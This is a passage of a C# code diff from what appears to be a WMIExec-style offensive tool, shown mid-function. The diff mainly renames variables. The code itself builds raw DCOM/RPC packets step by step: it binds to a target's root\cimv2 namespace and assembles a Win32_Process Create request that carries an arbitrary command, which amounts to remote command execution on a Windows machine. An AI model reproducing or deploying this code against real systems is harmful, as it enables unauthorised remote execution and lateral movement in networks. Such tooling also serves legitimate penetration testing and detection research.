                                                 break;
                                             case 1:
                                                 {
-                                                    sequence_number = new byte[] { 0x02, 0x00, 0x00, 0x00 };
-                                                    request_flags = new byte[] { 0x83 };
-                                                    request_auth_padding = 8;
-                                                    request_call_ID = new byte[] { 0x04, 0x00, 0x00, 0x00 };
-                                                    request_context_ID = new byte[] { 0x03, 0x00 };
-                                                    request_opnum = new byte[] { 0x03, 0x00 };
-                                                    request_UUID = IPID;
+                                                    Sequence_Number = new byte[] { 0x02, 0x00, 0x00, 0x00 };
+                                                    Request_Flags = new byte[] { 0x83 };
+                                                    Request_Auth_Padding = 8;
+                                                    Request_Call_ID = new byte[] { 0x04, 0x00, 0x00, 0x00 };
+                                                    Request_Context_ID = new byte[] { 0x03, 0x00 };
+                                                    Request_Opnum = new byte[] { 0x03, 0x00 };
+                                                    Request_UUID = IPID;
                                                     WMI_client_stage_next = "Request";
-                                                    stub_data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
-                                                        .Concat(causality_ID_bytes)
+                                                    Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                                                        .Concat(Causality_ID_Bytes)
                                                         .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                                 }
                                                 break;
                                             case 2:
                                                 {
-                                                    sequence_number = new byte[] { 0x03, 0x00, 0x00, 0x00 };
-                                                    request_flags = new byte[] { 0x83 };
-                                                    request_auth_padding = 0;
-                                                    request_call_ID = new byte[] { 0x05, 0x00, 0x00, 0x00 };
-                                                    request_context_ID = new byte[] { 0x03, 0x00 };
-                                                    request_opnum = new byte[] { 0x06, 0x00 };
-                                                    request_UUID = IPID;
-                                                    WMI_namespace_length = BitConverter.GetBytes(target_short.Length + 14);
-                                                    WMI_namespace_unicode = Encoding.Unicode.GetBytes("\\\\" + target_short + "\\root\\cimv2");
+                                                    Sequence_Number = new byte[] { 0x03, 0x00, 0x00, 0x00 };
+                                                    Request_Flags = new byte[] { 0x83 };
+                                                    Request_Auth_Padding = 0;
+                                                    Request_Call_ID = new byte[] { 0x05, 0x00, 0x00, 0x00 };
+                                                    Request_Context_ID = new byte[] { 0x03, 0x00 };
+                                                    Request_Opnum = new byte[] { 0x06, 0x00 };
+                                                    Request_UUID = IPID;
+                                                    WMI_Namespace_Length = BitConverter.GetBytes(Target_Short.Length + 14);
+                                                    WMI_Namespace_Unicode = Encoding.Unicode.GetBytes("\\\\" + Target_Short + "\\root\\cimv2");
                                                     WMI_client_stage_next = "Request";
 
-                                                    if (Convert.ToBoolean(target_short.Length % 2))
+                                                    if (Convert.ToBoolean(Target_Short.Length % 2))
                                                     {
-                                                        WMI_namespace_unicode = WMI_namespace_unicode.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                                        WMI_Namespace_Unicode = WMI_Namespace_Unicode.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                                     }
                                                     else
                                                     {
-                                                        WMI_namespace_unicode = WMI_namespace_unicode.Concat(new byte[] { 0x00, 0x0 }).ToArray();
+                                                        WMI_Namespace_Unicode = WMI_Namespace_Unicode.Concat(new byte[] { 0x00, 0x0 }).ToArray();
 
                                                     }
 
-                                                    stub_data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
-                                                        .Concat(causality_ID_bytes)
+                                                    Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                                                        .Concat(Causality_ID_Bytes)
                                                         .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 })
-                                                        .Concat(WMI_namespace_length)
+                                                        .Concat(WMI_Namespace_Length)
                                                         .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
-                                                        .Concat(WMI_namespace_length)
-                                                        .Concat(WMI_namespace_unicode)
+                                                        .Concat(WMI_Namespace_Length)
+                                                        .Concat(WMI_Namespace_Unicode)
                                                         .Concat(new byte[] { 0x04, 0x00, 0x02, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x2d, 0x00, 0x55, 0x00, 0x53, 0x00, 0x2c, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                    
                                                 }
                                                 break;
                                             case 3:
                                                 {
-                                                    sequence_number = new byte[] { 0x04, 0x00, 0x00, 0x00 };
-                                                    request_flags = new byte[] { 0x83 };
-                                                    request_auth_padding = 8;
-                                                    request_context_ID = new byte[] { 0x00, 0x00 };
-                                                    request_call_ID = new byte[] { 0x06, 0x00, 0x00, 0x00 };
-                                                    request_opnum = new byte[] { 0x05, 0x00 };
-                                                    request_UUID = object_UUID;
+                                                    Sequence_Number = new byte[] { 0x04, 0x00, 0x00, 0x00 };
+                                                    Request_Flags = new byte[] { 0x83 };
+                                                    Request_Auth_Padding = 8;
+                                                    Request_Context_ID = new byte[] { 0x00, 0x00 };
+                                                    Request_Call_ID = new byte[] { 0x06, 0x00, 0x00, 0x00 };
+                                                    Request_Opnum = new byte[] { 0x05, 0x00 };
+                                                    Request_UUID = Object_UUID;
                                                     WMI_client_stage_next = "Request";
-                                                    WMI_data = BitConverter.ToString(WMI_client_receive).Replace("-", "");
-                                                    OXID_index = WMI_data.IndexOf(OXID);
-                                                    OXID_bytes_index = OXID_index / 2;
-                                                    IPID2 = Utilities.GetByteRange(WMI_client_receive, OXID_bytes_index + 16, OXID_bytes_index + 31);
-                                                    OrderedDictionary packet_rem_release = WMIExec.DCOMRemRelease(causality_ID_bytes, object_UUID2, IPID);
-                                                    stub_data = Utilities.ConvertFromPacketOrderedDictionary(packet_rem_release);
+                                                    WMI_Data = BitConverter.ToString(WMI_Client_Receive).Replace("-", "");
+                                                    OXID_Index = WMI_Data.IndexOf(OXID);
+                                                    OXID_Bytes_Index = OXID_Index / 2;
+                                                    IPID2 = Utilities.GetByteRange(WMI_Client_Receive, OXID_Bytes_Index + 16, OXID_Bytes_Index + 31);
+                                                    OrderedDictionary Packet_rem_release = WMIExec.DCOMRemRelease(Causality_ID_Bytes, Object_UUID2, IPID);
+                                                    Stub_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_rem_release);
                                                 }
                                                 break;
                                             case 4:
                                                 {
-                                                    sequence_number = new byte[] { 0x05, 0x00, 0x00, 0x00 };
-                                                    request_flags = new byte[] { 0x83 };
-                                                    request_auth_padding = 4;
-                                                    request_context_ID = new byte[] { 0x00, 0x00 };
-                                                    request_call_ID = new byte[] { 0x07, 0x00, 0x00, 0x00 };
-                                                    request_opnum = new byte[] { 0x03, 0x00 };
-                                                    request_UUID = object_UUID;
+                                                    Sequence_Number = new byte[] { 0x05, 0x00, 0x00, 0x00 };
+                                                    Request_Flags = new byte[] { 0x83 };
+                                                    Request_Auth_Padding = 4;
+                                                    Request_Context_ID = new byte[] { 0x00, 0x00 };
+                                                    Request_Call_ID = new byte[] { 0x07, 0x00, 0x00, 0x00 };
+                                                    Request_Opnum = new byte[] { 0x03, 0x00 };
+                                                    Request_UUID = Object_UUID;
                                                     WMI_client_stage_next = "Request";
-                                                    packet_rem_query_interface = WMIExec.DCOMRemQueryInterface(causality_ID_bytes, IPID2, new byte[] { 0x9e, 0xc1, 0xfc, 0xc3, 0x70, 0xa9, 0xd2, 0x11, 0x8b, 0x5a, 0x00, 0xa0, 0xc9, 0xb7, 0xc9, 0xc4 });
-                                                    stub_data = Utilities.ConvertFromPacketOrderedDictionary(packet_rem_query_interface);
+                                                    Packet_Rem_Query_Interface = WMIExec.DCOMRemQueryInterface(Causality_ID_Bytes, IPID2, new byte[] { 0x9e, 0xc1, 0xfc, 0xc3, 0x70, 0xa9, 0xd2, 0x11, 0x8b, 0x5a, 0x00, 0xa0, 0xc9, 0xb7, 0xc9, 0xc4 });
+                                                    Stub_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_Rem_Query_Interface);
 
 
                                                 }
                                                 break;
                                             case 5:
                                                 {
-                                                    sequence_number = new byte[] { 0x06, 0x00, 0x00, 0x00 };
-                                                    request_flags = new byte[] { 0x83 };
-                                                    request_auth_padding = 4;
-                                                    request_call_ID = new byte[] { 0x08, 0x00, 0x00, 0x00 };
-                                                    request_context_ID = new byte[] { 0x00, 0x00 };
-                                                    request_opnum = new byte[] { 0x03, 0x00 };
-                                                    request_UUID = object_UUID;
+                                                    Sequence_Number = new byte[] { 0x06, 0x00, 0x00, 0x00 };
+                                                    Request_Flags = new byte[] { 0x83 };
+                                                    Request_Auth_Padding = 4;
+                                                    Request_Call_ID = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                                    Request_Context_ID = new byte[] { 0x00, 0x00 };
+                                                    Request_Opnum = new byte[] { 0x03, 0x00 };
+                                                    Request_UUID = Object_UUID;
                                                     WMI_client_stage_next = "AlterContext";
-                                                    packet_rem_query_interface = WMIExec.DCOMRemQueryInterface(causality_ID_bytes, IPID2, new byte[] { 0x83, 0xb2, 0x96, 0xb1, 0xb4, 0xba, 0x1a, 0x10, 0xb6, 0x9c, 0x00, 0xaa, 0x00, 0x34, 0x1d, 0x07 });
-                                                    stub_data = Utilities.ConvertFromPacketOrderedDictionary(packet_rem_query_interface);
+                                                    Packet_Rem_Query_Interface = WMIExec.DCOMRemQueryInterface(Causality_ID_Bytes, IPID2, new byte[] { 0x83, 0xb2, 0x96, 0xb1, 0xb4, 0xba, 0x1a, 0x10, 0xb6, 0x9c, 0x00, 0xaa, 0x00, 0x34, 0x1d, 0x07 });
+                                                    Stub_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_Rem_Query_Interface);
                                                 }
                                                 break;
                                             case 6:
                                                 {
-                                                    sequence_number = new byte[] { 0x07, 0x00, 0x00, 0x00 };
-                                                    request_flags = new byte[] { 0x83 };
-                                                    request_auth_padding = 0;
-                                                    request_context_ID = new byte[] { 0x04, 0x00 };
-                                                    request_call_ID = new byte[] { 0x09, 0x00, 0x00, 0x00 };
-                                                    request_opnum = new byte[] { 0x06, 0x00 };
-                                                    request_UUID = IPID2;
+                                                    Sequence_Number = new byte[] { 0x07, 0x00, 0x00, 0x00 };
+                                                    Request_Flags = new byte[] { 0x83 };
+                                                    Request_Auth_Padding = 0;
+                                                    Request_Context_ID = new byte[] { 0x04, 0x00 };
+                                                    Request_Call_ID = new byte[] { 0x09, 0x00, 0x00, 0x00 };
+                                                    Request_Opnum = new byte[] { 0x06, 0x00 };
+                                                    Request_UUID = IPID2;
                                                     WMI_client_stage_next = "Request";
 
-                                                    stub_data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
-                                                        .Concat(causality_ID_bytes)
+                                                    Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                                                        .Concat(Causality_ID_Bytes)
                                                         .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x77, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                                 }
                                                 break;
                                             case 7:
                                                 {
-                                                    sequence_number = new byte[] { 0x08, 0x00, 0x00, 0x00 };
-                                                    request_flags = new byte[] { 0x83 };
-                                                    request_auth_padding = 0;
-                                                    request_context_ID = new byte[] { 0x04, 0x00 };
-                                                    request_call_ID = new byte[] { 0x10, 0x00, 0x00, 0x00 };
-                                                    request_opnum = new byte[] { 0x06, 0x00 };
-                                                    request_UUID = IPID2;
+                                                    Sequence_Number = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                                    Request_Flags = new byte[] { 0x83 };
+                                                    Request_Auth_Padding = 0;
+                                                    Request_Context_ID = new byte[] { 0x04, 0x00 };
+                                                    Request_Call_ID = new byte[] { 0x10, 0x00, 0x00, 0x00 };
+                                                    Request_Opnum = new byte[] { 0x06, 0x00 };
+                                                    Request_UUID = IPID2;
                                                     WMI_client_stage_next = "Request";
 
-                                                    stub_data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
-                                                        .Concat(causality_ID_bytes)
+                                                    Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                                                        .Concat(Causality_ID_Bytes)
                                                         .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x77, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                                 }
                                                 break;
                                             default:
                                                 {
-                                                    if (sequence_number[0] >= 8)
+                                                    if (Sequence_Number[0] >= 8)
                                                     {
-                                                        sequence_number = new byte[] { 0x09, 0x00, 0x00, 0x00 };
-                                                        request_auth_padding = 0;
-                                                        request_context_ID = new byte[] { 0x04, 0x00 };
-                                                        request_call_ID = new byte[] { 0x0b, 0x00, 0x00, 0x00 };
-                                                        request_opnum = new byte[] { 0x18, 0x00 };
-                                                        request_UUID = IPID2;
-                                                        byte[] stub_length = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 1769), 0, 1);
-                                                        byte[] stub_length2 = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 1727), 0, 1); ;
-                                                        byte[] stub_length3 = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 1713), 0, 1);
-                                                        byte[] command_length = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 93), 0, 1);
-                                                        byte[] command_length2 = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 16), 0, 1);
-                                                        byte[] command_bytes = Encoding.UTF8.GetBytes(command);
+                                                        Sequence_Number = new byte[] { 0x09, 0x00, 0x00, 0x00 };
+                                                        Request_Auth_Padding = 0;
+                                                        Request_Context_ID = new byte[] { 0x04, 0x00 };
+                                                        Request_Call_ID = new byte[] { 0x0b, 0x00, 0x00, 0x00 };
+                                                        Request_Opnum = new byte[] { 0x18, 0x00 };
+                                                        Request_UUID = IPID2;
+                                                        byte[] Stub_Length = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 1769), 0, 1);
+                                                        byte[] Stub_Length2 = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 1727), 0, 1); ;
+                                                        byte[] Stub_Length3 = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 1713), 0, 1);
+                                                        byte[] Command_Length = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 93), 0, 1);
+                                                        byte[] Command_Length2 = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 16), 0, 1);
+                                                        byte[] Command_Bytes = Encoding.UTF8.GetBytes(command);
 
-                                                        string command_padding_check = Convert.ToString(Decimal.Divide(command.Length, 4));
-                                                        if (command_padding_check.Contains(".75"))
+                                                        string Command_Padding_Check = Convert.ToString(Decimal.Divide(command.Length, 4));
+                                                        if (Command_Padding_Check.Contains(".75"))
                                                         {
-                                                            command_bytes = command_bytes.Concat(new byte[] { 0x00 }).ToArray();
+                                                            Command_Bytes = Command_Bytes.Concat(new byte[] { 0x00 }).ToArray();
                                                         }
-                                                        else if (command_padding_check.Contains(".5"))
+                                                        else if (Command_Padding_Check.Contains(".5"))
                                                         {
-                                                            command_bytes = command_bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray();
+                                                            Command_Bytes = Command_Bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray();
                                                         }
-                                                        else if (command_padding_check.Contains(".25"))
+                                                        else if (Command_Padding_Check.Contains(".25"))
                                                         {
-                                                            command_bytes = command_bytes.Concat(new byte[] { 0x00, 0x00, 0x00 }).ToArray();
+                                                            Command_Bytes = Command_Bytes.Concat(new byte[] { 0x00, 0x00, 0x00 }).ToArray();
                                                         }
                                                         else
                                                         {
-                                                            command_bytes = command_bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                                            Command_Bytes = Command_Bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                                         }
 
-                                                        Console.WriteLine("big stub");
-                                                        stub_data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
-                                                            .Concat(causality_ID_bytes)
+                                                        Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
+                                                            .Concat(Causality_ID_Bytes)
                                                             .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x06, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x63, 0x00, 0x72, 0x00, 0x65, 0x00, 0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 })
-                                                            .Concat(stub_length)
+                                                            .Concat(Stub_Length)
                                                             .Concat(new byte[] { 0x00, 0x00})
-                                                            .Concat(stub_length)
+                                                            .Concat(Stub_Length)
                                                             .Concat(new byte[] { 0x00, 0x00, 0x4d, 0x45, 0x4f, 0x57, 0x04, 0x00, 0x00, 0x00, 0x81, 0xa6, 0x12, 0xdc, 0x7f, 0x73, 0xcf, 0x11, 0x88, 0x4d, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24, 0x12, 0xf8, 0x90, 0x45, 0x3a, 0x1d, 0xd0, 0x11, 0x89, 0x1f, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24, 0x00, 0x00, 0x00, 0x00 })
-                                                            .Concat(stub_length2)
+                                                            .Concat(Stub_Length2)
                                                             .Concat(new byte[] { 0x00, 0x00, 0x78, 0x56, 0x34, 0x12 })
-                                                            .Concat(stub_length3)
+                                                            .Concat(Stub_Length3)
                                                             .Concat(new byte[] { 0x00, 0x00, 0x02, 0x53, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x03, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00, 0x00, 0x15, 0x01, 0x00, 0x00, 0x73, 0x01, 0x00, 0x00, 0x76, 0x02, 0x00, 0x00, 0xd4, 0x02, 0x00, 0x00, 0xb1, 0x03, 0x00, 0x00, 0x15, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x12, 0x04, 0x00, 0x80, 0x00, 0x5f, 0x5f, 0x50, 0x41, 0x52, 0x41, 0x4d, 0x45, 0x54, 0x45, 0x52, 0x53, 0x00, 0x00, 0x61, 0x62, 0x73, 0x74, 0x72, 0x61, 0x63, 0x74, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x4c, 0x69, 0x6e, 0x65, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0x00, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x41, 0x50, 0x49, 0x7c, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x20, 0x61, 0x6e, 0x64, 0x20, 0x54, 0x68, 0x72, 0x65, 0x61, 0x64, 0x20, 0x46, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x7c, 0x6c, 0x70, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x4c, 0x69, 0x6e, 0x65, 0x20, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0xca, 0x00, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x59, 0x01, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0xca, 0x00, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6e, 0x74, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0xe2, 0x01, 0x00, 0x00, 0x00, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x41, 0x50, 0x49, 0x7c, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x20, 0x61, 0x6e, 0x64, 0x20, 0x54, 0x68, 0x72, 0x65, 0x61, 0x64, 0x20, 0x46, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x7c, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x7c, 0x6c, 0x70, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6e, 0x74, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x20, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x2b, 0x02, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0xda, 0x01, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xba, 0x02, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x2b, 0x02, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0xda, 0x01, 0x00, 0x00, 0x72, 0x02, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70, 0x49, 0x6e, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x00, 0x00, 0x6f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x4c, 0x03, 0x00, 0x00, 0x00, 0x57, 0x4d, 0x49, 0x7c, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x5f, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 